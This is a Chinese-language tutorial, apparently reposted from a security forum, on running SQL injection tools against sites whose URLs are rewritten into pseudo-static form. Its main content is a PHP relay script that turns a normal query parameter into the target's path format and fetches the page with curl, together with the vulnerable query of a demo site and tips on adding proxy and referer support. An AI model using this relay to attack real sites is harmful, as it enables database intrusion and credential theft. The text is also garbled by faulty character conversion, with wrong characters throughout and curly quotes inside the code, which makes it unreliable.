對僞靜態網站實施注射

對僞靜態網站實施注射

僞靜態網站注入方法，萊鳥掃盲來了哦，一般狀況下，動態腳本的網站的url相似下面這樣：

http://www.91ri.org/news.php?id=111

作了僞靜態以後就成這樣了

http://www.91ri.org/news.php/id/111.html

以斜槓「/」代替了「=」並在最後加上.html，這樣一來，就沒法直接用工具來注入了，

如今咱們就來討論下如何用工具來注入，你們都知道cookies注入中轉吧，其實原理都差很少，

咱們本身寫一個動態網頁腳本，構造本身的url規則，經過這個頁面中轉來訪問目標頁！

即咱們把僞靜態url規則變回原來的?id=123這樣的形式，造成一個普通的可方便注入的url。

好吧，試驗下！我在本地用thikphp搭建了一個簡單的注入點，

由於thinkphp自帶了簡單的僞靜態，比較方便演示。

這個注入點的sql以下：接收get過來的id

SELECT account AS username,password FROM think_user WHERE id=1

頁面url以下：

http://www.91ri.org/index.php/index/index/id/111.html

變幻111的值來注入！

我比較熟悉php，就用php來寫一個注入中轉頁面吧

tmd.php 中轉頁面源碼：

set_time_limit(0);
$id=$_GET[「id」];
$id=str_replace(」 「,」%20」,$id);
$id=str_replace(「=」,」%3D」,$id);
//$url = 「http://www.91ri.org/test/id-$id.html「;
$url = 「http://www.91ri.org/inj/index.php/index/index/id/$id.html「;
//echo $url;
 
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, 「$url」);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
 
$output = curl_exec($ch);
curl_close($ch);
print_r($output);

將這個文件保存成tmd.php便可，這個文件url以下：

http://www.91ri.org/inj/tmd.php

把產生注入的$id根據目標頁的僞靜態規則放到指定的位置就能夠了。如上。

原理就是經過curl來取得目標頁的內容（與直接訪問目標頁效果同樣），

只須要修改$url的內容就能夠適應各類僞靜態規則了。

腳本比較簡陋，有須要的童鞋，可根據狀況加入post方式，代理，referer等功能。

咱們如今訪問 http://www.91ri.org/inj/tmd.php?id=111，

即至關於訪問 http://www.91ri.org/inj/index.php/index/index/id/111.html ，

如今咱們就能夠把 http://www.91ri.org/inj/tmd.php?id=111 這個鏈接放到工具裏面注入了。

本文做者不明(轉載時未見原做者版權)由網絡安全攻防研究室(www.91ri.org) 信息安全小組收集整理.